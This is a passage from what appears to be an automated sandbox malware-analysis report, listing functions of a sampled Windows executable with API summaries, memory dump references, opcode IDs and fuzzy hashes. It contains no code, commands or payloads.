                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1903627254-0
                                                                                                                    • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction ID: 7d1e87e932e56aee90cd8cdfa76613270112f1d8686f5d625885d67be7789962
                                                                                                                    • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction Fuzzy Hash: 71026066A18A8282DB50EF2ED4441BDA7A0FB95B98F905032DF4E07778CF3CD595C790
                                                                                                                    Function 00007FF7BB84D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction ID: 50ac0c5bf8ac114b938d2047ca0e26183d36fbd7c64a4a0bcd4f0ff89f8ae95d
                                                                                                                    • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction Fuzzy Hash: 20214A72519B4182EB109F5AE4483AAB7A0F79AFDAF844125DF8D03B68CF7CE1188740
                                                                                                                    Function 00007FF7BB890B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 3721556410-2107944366
                                                                                                                    • Opcode ID: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                                                                    • Instruction ID: ae28bcd44fa0d48e9d65a09803b6ebef142a9061596c1d51fef0d20d48286b8c
                                                                                                                    • Opcode Fuzzy Hash: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                                                                    • Instruction Fuzzy Hash: 35619C22A14A5289EB40EF6DE8805ED7760FB65B98FD01136DE0D53ABDCE38E455C390
                                                                                                                    Function 00007FF7BB85A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 2$P
                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                    • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction ID: c7a0edff6b14ecc0733e09eb8e2b635cd8f617744069081f1f4cea594907353b
                                                                                                                    • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction Fuzzy Hash: 1851D632A0464685FB10AF7DD4C42BDB7A1BB22758F944136CF5E136A8CF39E4A1C7A0
                                                                                                                    Function 00007FF7BB85AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 4060274358-404129466
                                                                                                                    • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction ID: e3487cb5ed8b9cf1463f21112c3df3c9ea3fff29e83e0faf311d1ea70e93d35a
                                                                                                                    • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction Fuzzy Hash: CD214125A0CB8391FA54BB2DA580179E355BF66780FC45032DF4D463ADEF7DE4A183A0
                                                                                                                    Function 00007FF7BB87FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 50796853-0
                                                                                                                    • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                    • Instruction ID: e21e3279ca17e9a09621023c8914815eadd98eb95ef3503b2020ce04fb5cd01a
                                                                                                                    • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                    • Instruction Fuzzy Hash: E0B17162B0864286EB10EBAED4903BCA760BF66788F804432DF4D476AACF38D155C754
                                                                                                                    Function 00007FF7BB80443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                    • Instruction ID: 817312069566021aa030f0d14ac5235a0358239680f1bd342f72c3c5c4a9e454
                                                                                                                    • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                    • Instruction Fuzzy Hash: 25518531A4D54288F7647B2E945837D96A1BB67B48FDC4031CF4E466FDCE3CA4A4C2A0
                                                                                                                    Function 00007FF7BB8890A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                    • Instruction ID: 3f32b8300e833e3a9fdaa6cd5d1b9f91de6a2e1bcbec6193deaa4f8b09ae0cf9
                                                                                                                    • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                    • Instruction Fuzzy Hash: 3541CF3661878187E7208B29F418B6ABBA0F799BD5F505131EF8A47B28DF3CE4508B40
                                                                                                                    Function 00007FF7BB820BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
                                                                                                                    • Instruction ID: 216f3ec1f76e184fa0a99cef12d7a59e63ef45fb90ecc43d8345219fefc9220a
                                                                                                                    • Opcode Fuzzy Hash: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
                                                                                                                    • Instruction Fuzzy Hash: 67C1D922A0978289EA60AF1D90446BDEB51BBA6780FD54135DF4E077FDCE3CE46087A0
                                                                                                                    Function 00007FF7BB8609C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2550207440-0
                                                                                                                    • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                                                    • Instruction ID: c8d7c8b107b42908babc70736f1c9046b65730129924b9eebe16e13cdacf0cc0
                                                                                                                    • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                                                    • Instruction Fuzzy Hash: 4FA1A522A0860249FB14AB6DC4843BC6761FB5AB85F954432DF0EC77A9DF7CE461C3A4
                                                                                                                    Function 00007FF7BB7E2100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                    • Instruction ID: 25812953dfc64707f2dc7c051ba468e1c0fb23cafcae20fe6e12aef44ee7bd28
                                                                                                                    • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                    • Instruction Fuzzy Hash: BDA1AF72A086C086D7249F5DA4006AEFB65FB9AB94F904126EF8913B7CCB3CD552CF10
                                                                                                                    Function 00007FF7BB88FB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3694350264-0
                                                                                                                    • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                    • Instruction ID: ed7ba3583d51d94c8afdad860ef869c83425967468b035811d4147fbc66e2c0f
                                                                                                                    • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                    • Instruction Fuzzy Hash: 7E91A221E0864647FB64BA1DD8583B9B392BFA6784F944432CF4D436B9CF3CE46183A0
                                                                                                                    Function 00007FF7BB859034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                    • Instruction ID: 7db914769ebce0e5b57b1823f7f2e17c210cb9f72a3bc83fa2bb93c719af9571
                                                                                                                    • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                    • Instruction Fuzzy Hash: 0551B012A0C2E152FB61AB3D554467DAF91FB67BC0F889074DF8907B5ACA2CE46483B0
                                                                                                                    Function 00007FF7BB858E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                                    • Instruction ID: 2d64800b6c62bd996cea8240ff682a514cd8f73a5bf3c324b38081ecb9ce58a7
                                                                                                                    • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                                    • Instruction Fuzzy Hash: 8751E312A0C2D155FB61A77DA58067DAF61FB57BC0F888075DF8907E5ACE08E4B483B1
                                                                                                                    Function 00007FF7BB86DBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401586794-0
                                                                                                                    • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                    • Instruction ID: 1f7ff8e132f32a3b35c25f9aa538b883f49a645652ece9c7947ae776accc7aa8
                                                                                                                    • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                    • Instruction Fuzzy Hash: 8551E62260874186FB14EF2DE8006AEA7A1FB5AB88F945031DF0E57B68DF39D465C790
                                                                                                                    Function 00007FF7BB889248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3360111000-0
                                                                                                                    • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                    • Instruction ID: 83809ff6b8378d38f98a9695679ae1a7bb1437c626f38d808e67867ca6b23c16
                                                                                                                    • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                    • Instruction Fuzzy Hash: 32418525A05A4682EA509B1DE894178B360FBD6F94F946132CF1E87BB9CF3DE4518390
                                                                                                                    Function 00007FF7BB8737A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
